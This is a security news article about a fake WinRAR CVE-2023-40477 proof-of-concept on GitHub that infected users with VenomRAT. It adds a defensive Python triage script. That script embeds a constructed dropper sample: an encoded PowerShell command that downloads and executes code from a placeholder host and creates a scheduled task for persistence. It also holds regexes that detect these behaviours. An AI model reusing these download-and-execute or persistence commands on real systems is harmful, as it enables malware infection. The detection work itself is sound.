A threat actor has been using GitHub to distribute a fake proof-of-concept (PoC) exploit for a recently patched WinRAR vulnerability, CVE-2023-40477. The bogus PoC, discovered by Palo Alto Networks' Unit 42 research team, was built to infect anyone who ran it with the VenomRAT malware. The attacker, known as 'whalersplonk', uploaded the malicious code to GitHub on August 21, 2023. Although the campaign is no longer active, it underscores the risk of downloading and running PoCs from GitHub without vetting them first.
CVE-2023-40477 is an arbitrary code execution flaw that can be triggered when a specially crafted RAR file is opened in WinRAR versions prior to 6.23. The vulnerability was reported to WinRAR by Trend Micro's Zero Day Initiative on June 8, 2023, but was not publicly disclosed until August 17, 2023. WinRAR fixed it in version 6.23, released on August 2, 2023, ahead of the public disclosure.
The threat actor 'whalersplonk' moved swiftly to exploit this opportunity by distributing malware disguised as exploit code for the new WinRAR vulnerability. The malicious package was made to appear more legitimate by including a summary in the README file and a Streamable video demonstrating how to use the PoC. However, the Unit 42 team revealed that the bogus Python PoC script was actually a modified version of a publicly available exploit for a different vulnerability, CVE-2023-25157, a critical SQL injection flaw affecting GeoServer.
When run, the PoC does not attempt any exploit. Instead, it writes a batch script that downloads an encoded PowerShell script and executes it on the host. That PowerShell script in turn downloads the VenomRAT payload and creates a scheduled task that launches it every three minutes. Once VenomRAT is running on a Windows device, it starts a keylogger that records every keystroke to a local text file, then connects to its command and control (C2) server, from which it can receive a variety of commands to execute on the infected machine.
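The dropper chain above is exactly the kind of behaviour a quick static triage catches before anyone runs a downloaded "PoC". The following is an added example, not code from the original page, from Unit 42, or from the whalersplonk repository: it scans a script for dropper indicators (writing a .bat file, launching hidden PowerShell, download cradles, schtasks), decodes any -EncodedCommand blob (which is base64 of UTF-16LE, not UTF-8) so the second stage is scanned as well, reports scheduled-task intervals, and flags leftover references to a CVE other than the one the repository claims. The embedded SAMPLE_POC, STAGE2 and the example.invalid URL are constructed for the demo, and the indicator regexes are my own choice of heuristics, not a published rule set.

```python
"""Static triage of a downloaded "PoC" script before anyone executes it.

Added example. SAMPLE_POC and STAGE2 below are a constructed sketch of the
dropper chain described in the article (bat file -> encoded PowerShell ->
download -> schtasks every 3 minutes), not the whalersplonk code.
example.invalid is a reserved placeholder domain, not a real C2.
"""
import base64
import re

# Constructed stage-2 payload: the command the batch file hands to PowerShell.
STAGE2 = ("$u='http://example.invalid/a.txt';"
          "iex (New-Object Net.WebClient).DownloadString($u);"
          "schtasks /create /sc minute /mo 3 /tn Update /tr C:\\Users\\Public\\u.exe /f")
# -EncodedCommand takes base64 of UTF-16LE; decoding the blob as UTF-8 yields garbage.
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()

# Constructed fake PoC, modelled on the behaviour described above.
SAMPLE_POC = f'''
import subprocess
# CVE-2023-40477 "exploit" (constructed; note the leftover CVE-2023-25157 GeoServer reference)
def exploit(target):
    with open("run.bat", "w") as f:
        f.write("powershell -w hidden -nop -EncodedCommand {ENCODED}\\n")
    subprocess.call(["run.bat"])
'''

# Behaviours that have no business in an exploit for an archive parser.
INDICATORS = {
    "writes_batch_file":   re.compile(r"""open\(\s*['"][^'"]+\.(?:bat|cmd)['"]\s*,\s*['"]w""", re.I),
    "launches_powershell": re.compile(r"powershell(?:\.exe)?\b", re.I),
    "hidden_window":       re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "download_cradle":     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|urlretrieve|urlopen", re.I),
    "scheduled_task":      re.compile(r"schtasks(?:\.exe)?\s+/create", re.I),
    "encoded_command":     re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I),
}
TASK_INTERVAL = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
CVE_ID = re.compile(r"CVE-\d{4}-\d{4,}", re.I)


def decode_encoded_commands(text):
    """Decode every -EncodedCommand blob found in text (base64 of UTF-16LE)."""
    decoded = []
    for m in INDICATORS["encoded_command"].finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64/UTF-16 after all; the raw indicator still fires
    return decoded


def expand_stages(script_text, max_depth=3):
    """Follow encoded PowerShell a few levels down so the real payload gets scanned."""
    stages, frontier = [("script", script_text)], [script_text]
    for depth in range(1, max_depth + 1):
        frontier = [d for t in frontier for d in decode_encoded_commands(t)]
        if not frontier:
            break
        stages.extend((f"decoded-powershell-{depth}", t) for t in frontier)
    return stages


def triage(script_text):
    """Return (stage, indicator, evidence) for every indicator hit at every stage."""
    findings = []
    for stage, text in expand_stages(script_text):
        for name, rx in INDICATORS.items():
            findings.extend((stage, name, m.group(0)[:60]) for m in rx.finditer(text))
    return findings


def task_intervals(script_text):
    """Minutes between runs for every 'schtasks /sc minute' job created by any stage."""
    return [int(n) for _, text in expand_stages(script_text) for n in TASK_INTERVAL.findall(text)]


def other_cves(script_text, claimed):
    """CVE IDs referenced in the script other than the one the repository claims."""
    return {c.upper() for c in CVE_ID.findall(script_text)} - {claimed.upper()}


def verdict(script_text, claimed_cve):
    """Coarse decision: persistence or a PowerShell download cradle means do not run."""
    names = {n for _, n, _ in triage(script_text)}
    if "scheduled_task" in names or {"launches_powershell", "download_cradle"} <= names:
        return "do not run: dropper behaviour"
    if names or other_cves(script_text, claimed_cve):
        return "manual review"
    return "no dropper indicators"


if __name__ == "__main__":
    for finding in triage(SAMPLE_POC):
        print(*finding, sep="\t")
    print("task intervals (min):", task_intervals(SAMPLE_POC))
    print("other CVEs referenced:", other_cves(SAMPLE_POC, "CVE-2023-40477"))
    print(verdict(SAMPLE_POC, "CVE-2023-40477"))
```

Run against the constructed sample, the first stage only shows a batch file being written and hidden PowerShell being launched with an encoded command; the download cradle and the three-minute scheduled task appear only after the blob is decoded, which is why a triage that stops at the raw script text misses the point of the payload. The CVE cross-check is a cheap extra: a script that claims to target one CVE but still carries identifiers from another is a strong hint it was repurposed.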
Given that VenomRAT can be used to deploy other payloads and steal credentials, anyone who ran this fake PoC should treat the host as compromised and change the passwords for all accounts used on it. The timeline shared by Unit 42 suggests that the threat actor set up the infrastructure and payload well before the public disclosure of the WinRAR vulnerability and then waited for a high-profile flaw to wrap a deceptive PoC around. The same attacker may well use the security community's attention on newly disclosed vulnerabilities to spread misleading PoCs for other flaws in the future.
Fake PoCs on GitHub, which often target other criminals and security researchers, are a well-documented attack method. In late 2022, researchers discovered thousands of GitHub repositories promoting fraudulent PoC exploits for a range of vulnerabilities, many of which were deploying malware, malicious PowerShell scripts, hidden info-stealer downloaders, and Cobalt Strike droppers. More recently, in June 2023, attackers posing as cybersecurity researchers released several fake 0-day exploits targeting Linux and Windows systems with malware.